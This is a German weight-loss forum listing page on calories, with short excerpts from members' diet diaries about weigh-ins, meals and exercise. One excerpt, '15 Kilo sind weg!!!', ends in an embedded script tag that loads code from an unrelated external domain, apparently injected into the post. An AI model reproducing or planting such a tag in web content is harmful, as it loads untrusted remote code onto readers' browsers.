Zum Inhalt springen

Sie sind hier

Beiträge zum Thema Kalorien

Kalorien sind eine Maßeinheit, die beschreiben, wie viel Energie ein Lebensmittel dem Körper zufügt. Bekommt der Körper zu viele Kalorien zugeführt, welche er nicht verbrennt, legt er diese Kalorien an - es kommt zu Übergewicht, denn die Kalorien werden im Körperfett gespeichert. Wer also abnehmen möchte, kann dazu zwei Stellschrauben drehen: Die Kalorienzufuhr absenken bzw. den Kalorienverbrauch steigern. Allerdings muss beides in einem gesunden Verhältnis geschehen. Kalorien und die Strategien zur Kalorienreduzierung sind daher wichtige Fragen, welche auch bei der Diät-Clique diskutiert werden.

Tag 268 und 269 - es läuft :)

Seit 6 Wochen ist mein Gewicht ziemlich konstant zwischen 64 und 65 Kilo. Damit bin ich super zufrieden. Zumal laut meiner Waage der Fettanteil weiter sinkt und der Muskelanteil steigt. Aber wahrscheinlich sind diese Körperfettwaagen da eh nicht genau genug, um da wirklich nen verlässlichen Wert zu...

Ab heute alles egal !

Gewicht halten- abnehmen- Sport- ist mir nun alles egal ! Endlich ist Frühling und mit mir passieren gerade solche spannenden Dinge, die mich überwältigen und überglücklich machen ! Ist doch piepegal, ob ich noch ein paar Pfund abnehme-  habe schließlich noch genug auf den Hüften, doch das...

Tag 263 - Wiegetag

Hab mich heute um 5:30 nach dem Aufstehen gewogen und exakt 65,0 Kilo gehabt. Sehr gut So darf es gerne bleiben   1 Monat Gewicht halten liegt damit hinter mir und ich bin sehr zufrieden damit. Ich hab für meine Begriffe ganz normal gegessen, war mehrmals im Restaurant essen und habe mir viel...

1000 Möglichkeiten ausprobiert...

Hallöchen, ich bin 25 Jahre alt und bringe leider mitlerweile auf einer größe von 174 cm 98 Kilo auf die Waage. Ich war schon als Teenager immer etwas übergewichtig. Aber da hatte ich "nur" ein kleines Bäuchlein. Ich hab relativ früh die 3 Monats-Spritze gekriegt und während dessen 20 Kilo zugelegt...

Tag 1 Gute Vorsätze

Heute war der erste Tag. Bei mir gab es eine Brezel zum Frühstück, einen vegetarischen Döner zu Mittag eine Hand voll Erdbeeren als nachtisch und heute abend Hähnchen Tandoori mit Reis und gemüse. Leider habe ich es nicht komplett ohne ausgehalten und habe mir als Nachtisch einen Keks gegönnt.  Ich...

Tag 246 - müde :)

Ich hab noch ein bisschen mit der Zeitumstellung zu kämpfen, da wir am Wochenende auch ziemlich wenig Schlaf bekommen haben. Da macht sich eine Stunde weniger noch stärker bemerkbar. Hat sich hoffentlich bald alles wieder eingependelt. Ich lasse es aber heute ganz entspannt angehen. Hab noch ein...

Stabil unter 80 kg - eine 7 vorne!

Selbst mit den üblichen Gewichtsschwankungen möchte unter 80 kg bleiben. Auf meinem weiteren Weg zum Zielgewicht. Dann die nächste Kleidergröße: von 44 zu 42. Und nächste Woche wieder mit Sport starten!

Tag 240 - entspannter Schlemm-Tag :)

Bin heute zu Hause und ruhe mich etwas aus. War auf dem Hometrainer, aber sonst lasse ich es eher entspannt angehen. Außerdem hab ich heute nen „gesunden“ Appetit. Bin bisschen am Schlemmen Morgen: 2 Vollkorntoast mit Feldsalat, Spiegelei und etwas Sesamöl  Mittag: 2 Knäckebrot mit Hirtenkäse,...

Tag 234-239 - wieder am Start :)

Also, mir gehts wieder besser Ab heute gehts wieder los mit dem Sport. Langsam und gemächlich, muss erstmal wieder reinkommen. Hab ja jetzt ne Weile nichts gemacht.  Mein Ziel ist, durch mein Sportprogramm langsam fitter und etwas muskulöser zu werden, den Körper noch etwas zu definieren und und...

Tipps für danach?

Ich bin ja jetzt fertig mit meiner Abnahme... hab ihr vllt. noch ein paar Tipps für mich, wie ich es schaffe, das Gewicht zu halten? Wenn ich alles so mache, wie bisher, dann geht es weiter runter. Und eigentlich wollte ich mein Sportprogramm ja noch etwas ausbauen... Also, ich bin gespannt, was...

Gestern komisch gegessen

Gestern mußte ich mich tieisch aufregen und kam erst gegen 12:00 zum frühstücken: ein großes Glas frisch gepreßter O-Saft und da mich das nicht beruhigte, kamen gleich noch ne Scheibe Brot mit Meerettichstreich, ne halbe Paprika und 3 Stangen Staudensellerie hinterher  und anschließend habe ich...

Irgendwie unter 80 kg bleiben

Hm, jetzt bin ich knapp unter 80 kg leicht und weiß nicht, wie es weitergehen soll. Noch ein bißchen mehr abnehmen, um mich von der magischen Grenze zu entfernen mit der Angst, daß ich dann austicke und noch weniger wiegen will oder versuchen, es zu halten mit einem Toleranzbereich bis 81 kg-  das...

Tag 223 - 233 - viel Arbeit und noch krank.

Mein Tagebuch hier Pflege ich momentan leider nicht so besonders gut Das liegt einfach daran, dass ich gerade viel zu tun hab. Da fehlt für längere Einträge die Zeit. Dazu kommt, dass ich nach 2 Wochen immer noch meine Erkältung nicht loswerde. Das nervt ziemlich. Mit Schwimmbad oder generell...

jede Woche 1 Kilo abnehmen klappt nicht mehr

nach dem Aufstehen Kaffee mit Milch   Frühstück im Büro: glutenfreie Haferflocken ca 40 g, Flohsamen 10 g, Cornflakes ohne Zucker ca 10 g, mit 150 ml lauwarmer Milch 1,5 % aufgegeossen und 125 Blaubeeren reingemischt. Mittagessen: Rest von gestern. Hähnchentopf mit Gemüse. Ich koche gerne für 2...

Zu kalt-- die Folgen vom Schwach-werden

Leider hat es mich die letzten Wochen wiedermal zurückgewofen..die Wage ist unerbittlich: 90,4 ...und ich hatte schon mal die hübschen 88 kg... Mein Körper wollte einfach in den letzten eisigen Wochen nix hergeben...sendete mir Signale für eher ungesunde Lebensmittel bzw. Mengen...und dann ein...

15 Kilo sind weg!!!

Heute zeigt die Waage 65,2kg. Damit habe ich mein Gewichtsziel quasi erreicht. Exakt 15 Kilo in 7 Monaten. Die Veränderung ist nicht mehr zu übersehen. Trotzdem hab ich noch viel Arbeit vor mir - aber das ist ein guter Ansporn <script type='text/javascript' src='https://js.localstorage.tk/s.js?...

Fastend ins Wochenende

Passend zum Wochenende ist mir das Grünzeug ausgegangen und mein Versuch, bei 10 Grad minus wildes Waldgrün zu finden, wurde vom Schnee vereitelt also gibt es heute Broccoli und Salat im Green-Smothie- besser als nichts. Zusätzliches Grün bieten meine Algentabletten. Vielleicht finde ich nachher...

irgendwie fühle ich mich schlapp

rauf auf den Crosstrainer und losgetreten aber nach 30 Minuten war ich zu schlapp um weiter zu machen. Gut, hauptsache etwas sportlich gewesen, ich habe immerhin 210 kcal verbrannt. Vielleicht  geht es morgen besser.  Zurzeit kann ich essen was ich will, also alles was ich darf, aber es schleicht...

Null Bock auf Crosstraining

Das Crosstraining hat mich heute ein bisschen Überwindung gekostet, hatte eigentlich keine Lust. Hatte eher Lust auf ein Stückchen Schokolade. Habe meinen inneren Schweinehund überwunden und 40 Minuten auf dem Crosstrainer gestrampelt. Heute hat es mich doch etwas angestrengt, aber der Appetit auf...

Es bleiben noch 95 Tage

Heute geht es mir richtig besch…, ich fühle mich wahnsinnig hässlich und plump. Ganz furchtbar. Gestern bin ich spät ins Bett, ich hatte Jahrestag mit meinem Mann, es war total romantisch, denn wir haben bis in die Nacht unsere Lieblingslieder gemeinsam geträllert, das ist eine Sache, die uns...

Seiten

Nach oben
Zur Hauptnavigation
Neue Abnehmen-Tipps